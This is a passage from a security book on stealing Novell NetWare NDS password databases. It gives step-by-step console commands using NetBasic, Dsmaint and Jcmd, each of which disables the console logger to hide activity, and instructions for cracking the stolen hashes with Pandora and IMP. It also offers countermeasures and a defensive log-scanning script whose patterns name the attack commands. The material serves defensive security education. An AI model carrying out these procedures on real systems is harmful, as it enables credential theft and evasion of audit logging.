OWNING THE NDS FILES

Part of the document "network security secrets and solutions scambray mcclure part 5 docx" (pages 30 - 36)

Popularity: 8

Simplicity: 8

Impact: 10

Risk Rating: 9

Once the rconsole password has been acquired, the final step is to gain access to the NDS files. Novell stores its NDS files in a hidden directory called _netware on the SYS volume. The only way to access that directory is through console access (rconsole to the attacker). A number of techniques exist for grabbing these NDS files, and you’ll find certain attackers have their favorite.

] NetBasic.nlm (SYS:SYSTEM)

NetBasic Software Development Kit (SDK) is a product originally written by High Technology Software Corp. (HiTecSoft for short). The product allows the conversion of NetBasic scripts into Novell NLMs for use on NetWare web servers. The back-end component, netbasic.nlm, has a unique capability, originally discovered by an attacker: browse the entire volume from a command line, including the hidden _netware directory.

NetBasic is installed by default on all NetWare 4.x installations, so it’s our favorite technique for gaining access to NDS files. Also, NetBasic is the only NDS pilfer technique that copies the files without closing Directory Services. Here are the steps and commands you’ll need to carry it out:

1. Gain rconsole access with the SYS:\PUBLIC\rconsole command.

2. unload conlog (This will remove the console logger and any record of your commands.)

3. load netbasic.nlm

4. shell

5. cd \_netware (This directory is a hidden system directory only visible from the system console.)

6. md \login\nds

7. copy block.nds \login\nds\block.nds

8. copy entry.nds \login\nds\entry.nds

9. copy partitio.nds \login\nds\partitio.nds

10. copy value.nds \login\nds\value.nds

11. exit (This exits the shell.)

12. unload netbasic

13. load conlog (to return conlog status to normal)

14. From a client, use the map command to map a drive to the LOGIN\NDS directory created earlier.

15. Copy the *.NDS files to your local machine.

16. Start cracking.

] Dsmaint

If security-savvy NetWare administrators are loose on this server, NetBasic will be unavailable. In this case, you will need an alternative: Dsmaint. This NLM is not standard with NetWare 4.11 installation, but can be downloaded from Novell at http://www.support.novell.com. The file is DS411P.EXE and can be found on Novell’s “Minimum Patch List” web page at http://www.support.novell.com. But be forewarned, Dsmaint’s upgrade function automatically closes DS, so you don’t want to perform this during peak usage times. To return DS to its original, functional form, you must run a Dsmaint restore operation. In other words, you do not want to do this on a production server.

1. Map a drive to SYS:SYSTEM.

2. Copy dsmaint.nlm to the mapped drive.

3. Gain rconsole access with the rconsole command.

4. Type unload conlog. (This will remove the console logger and any record of your commands.)

5. Type load dsmaint.

6. Choose Prepare NDS For Hardware Upgrade.

7. Log in as Admin. This will unload Directory Services. The backup.nds file will then be automatically saved in SYS:SYSTEM.

8. Choose Restore NDS Following Hardware Upgrade.

9. Type load conlog.

10. From your client, map a drive to SYS:SYSTEM.

11. Copy the backup.nds file to your local system.

12. Use the extract function from Pandora to create the four NDS files (block, entry, partitio, and value).

13. Start cracking.

The older dsrepair.nlm also provides the ability to prepare for hardware upgrades, which backs up the NDS files in SYS:SYSTEM. However, this version of dsrepair should only be used with older versions of NetWare 4.x, and especially not with those upgraded with Support Packs.

] Jcmd

JRB Software Limited has produced excellent NetWare utilities for over six years, many of which can be used to audit your NetWare server’s security. But unlike NetBasic, Jcmd is not able to copy NDS files when they are open. So, like the dsmaint.nlm, Jcmd is not recommended on production systems. To get around this limitation, you must unload Directory Services. Use the following steps and commands to copy the NDS files using Jcmd:

1. Map a drive to SYS:SYSTEM.

2. Copy Jcmd.nlm to the mapped drive.

3. Gain rconsole access with the SYS:\PUBLIC\rconsole command.

4. unload conlog (This will remove the console logger and any record of your commands.)

5. unload ds

6. load jcmd

7. cd \_netware (A screen like the one shown next will be displayed.)

8. dir *.* (You need the wildcard (*.*) to see the files with Jcmd.)

9. md \login\nds

10. copy block.nds \login\nds

11. copy entry.nds \login\nds

12. copy partitio.nds \login\nds

13. copy value.nds \login\nds

14. exit (This exits the shell.)

15. load ds

16. load conlog

17. From a client, use the map command to map a drive to the SYS:LOGIN directory.

18. Copy the *.NDS files to your local machine.

19. Start cracking.

U Grabbing NDS Countermeasure

The countermeasure for the NDS capture goes back to reducing the number of weapons given to the attacker to use.

1. Encrypt the rconsole password—described earlier.

2. Remove netbasic.nlm from SYS:\SYSTEM and purge the directory. The netbasic.nlm is usually unnecessary.
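The two countermeasures above shrink the attacker's toolset; a second line of defense is to review the console log that conlog writes (SYS:ETC\CONSOLE.LOG by default) for the command sequences all three procedures share: conlog unloaded, netbasic/dsmaint/jcmd loaded, Directory Services unloaded, a change into \_netware, and NDS files copied out. The following Python script is an added example, not code from the book, from Novell or from any of the tool vendors named here. It assumes a simplified one-command-per-line format of SERVERNAME:command (conlog's real capture is raw screen output, so a real parser would need the same prompt stripping applied to more noise), and the sample log is constructed. Because the procedures unload conlog before doing anything interesting, the script treats an unload conlog followed by load conlog as a logging gap worth an alert on its own, since nothing typed in between was recorded.

```python
"""Scan a NetWare console log for the NDS-pilfering sequences described above.

Added example; the log format below is an assumption (one "SERVER:command"
line per command), not conlog's documented capture format.
"""
import re
from dataclasses import dataclass

# Console commands taken from the NetBasic, Dsmaint and Jcmd procedures,
# each mapped to the reason a defender cares about it.
SUSPICIOUS = {
    r"^unload\s+conlog\b": "console logger unloaded (commands after this are unrecorded)",
    r"^load\s+netbasic(\.nlm)?\b": "netbasic.nlm loaded (shell can browse hidden _netware)",
    r"^load\s+dsmaint(\.nlm)?\b": "dsmaint.nlm loaded (prepare-for-upgrade closes DS, writes backup.nds)",
    r"^load\s+jcmd(\.nlm)?\b": "jcmd.nlm loaded (needs DS unloaded to copy NDS files)",
    r"^unload\s+ds\b": "Directory Services unloaded",
    r"^cd\s+\\?_netware\b": "change into hidden _netware directory",
    r"^copy\s+\S+\.nds\b": "NDS file copied",
}

# Assumed prompt shape: SERVERNAME:command
PROMPT_RE = re.compile(r"^[A-Z0-9_-]+:\s*(.*)$")
NDS_FILE_RE = re.compile(r"^copy\s+(?:.*\\)?(block|entry|partitio|value)\.nds\b")


@dataclass
class Finding:
    line_no: int
    command: str
    reason: str


def parse_command(line):
    """Strip the server prompt; return the lower-cased command or None."""
    m = PROMPT_RE.match(line.strip())
    return m.group(1).strip().lower() if m else None


def scan_console_log(lines):
    """Return one Finding per suspicious command, plus one per logging gap."""
    findings = []
    logging_off_at = None  # line number where conlog was unloaded
    for n, line in enumerate(lines, 1):
        cmd = parse_command(line)
        if cmd is None:
            continue
        for pattern, reason in SUSPICIOUS.items():
            if re.match(pattern, cmd):
                findings.append(Finding(n, cmd, reason))
        if re.match(r"^unload\s+conlog\b", cmd):
            logging_off_at = n
        elif re.match(r"^load\s+conlog\b", cmd) and logging_off_at is not None:
            # The unload/load pair brackets a window with no record at all.
            findings.append(Finding(n, cmd,
                f"logging gap: conlog off since line {logging_off_at}, "
                "commands in between are unrecorded"))
            logging_off_at = None
    if logging_off_at is not None:
        findings.append(Finding(len(lines), "",
            f"conlog unloaded at line {logging_off_at} and never reloaded"))
    return findings


def nds_files_copied(findings):
    """Names of the four NDS files seen in copy commands (block, entry, partitio, value)."""
    names = set()
    for f in findings:
        m = NDS_FILE_RE.match(f.command)
        if m:
            names.add(m.group(1))
    return names


# Constructed sample: an rconsole user hides one window behind an unload/load
# of conlog, then runs the Jcmd procedure with logging still on.
SAMPLE_LOG = r"""
FS1:load monitor
FS1:unload conlog
FS1:load conlog
FS1:load jcmd
FS1:unload ds
FS1:cd \_netware
FS1:copy partitio.nds \login\nds
FS1:load ds
""".strip().splitlines()


if __name__ == "__main__":
    for f in scan_console_log(SAMPLE_LOG):
        print(f"line {f.line_no:>3}: {f.command!r:40} {f.reason}")
    print("NDS files copied:", sorted(nds_files_copied(scan_console_log(SAMPLE_LOG))))
```

Run against the constructed log it reports six findings: the unload conlog itself, the logging gap closed by load conlog, the jcmd load, the ds unload, the cd into \_netware and the copy of partitio.nds. The point of the gap finding is that a log which is merely quiet is not evidence of nothing having happened; pair this check with the rconsole password encryption above, because an attacker who holds rconsole can unload conlog at will.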

] Cracking the NDS Files

Once attackers download your NDS files, the party is pretty much over. You obviously never want to let attackers get to this point. Once NDS files are obtained, attackers will undoubtedly try to crack these files by using an NDS cracker. Using freeware products like IMP from Shade and Pandora’s crypto or crypto2, anyone can crack these files.

From an administrator’s point of view, it is a good idea to download your own NDS files in the same manner and try to crack users’ passwords yourself. You can fire off a crack with a very large dictionary file, and when a user’s password is revealed, you can notify the user to change his or her password. Beyond the simple security auditing, this exercise can be enlightening, as it will tell you how long your users’ passwords are.

Crypto and crypto2 from Pandora can be used, respectively, to brute force and dictionary crack the NDS files. To get cracking, you can follow these steps:

1. Copy the backup.nds or backup.ds files in your \PANDORA\EXE directory.

2. Use the extract utility to pull the four NDS files from backup.nds:

extract -d

3. Use the extract utility again to pull the password hashes from the NDS files and create a password.nds file, as shown in the following illustration.

extract -n

4. Now run crypto or crypto2 to brute force or dictionary crack the password.nds file, as shown in the following illustration.

crypto -u Admin

crypto2 dict.txt -u deoane

] IMP 2.0

IMP from Shade has both dictionary-crack and brute-force modes as well, but in graphical format. The dictionary crack is incredibly fast—blowing through 933,224 dictionary words takes only a couple minutes on a 200MHz Pentium II. The only limitation in IMP is with the brute forcer—usernames selected must be all the same-length password (but IMP kindly displays the length next to the username). IMP can be found at http://www.wastelands.gen.nz/.

The four NDS files either copied using the NetBasic technique or generated from the Pandora extract tool include block.nds, entry.nds, partitio.nds, and value.nds. The only file you’ll need to begin cracking is partitio.nds. Open IMP and load it from disk.

Then choose either Dictionary or Brute Force cracking, and let it run.

IMP will display the entire tree with each user to crack and their password length, as shown in Figure 7-8. This is important for two reasons:

▼ It helps you understand what length of passwords your users have.

▲ You can orient your brute-force attacks (which can take some time) to attack only those with short passwords (fewer than seven or eight characters).

Figure 7-8. IMP gives attackers valuable information that will help them hone their attacks
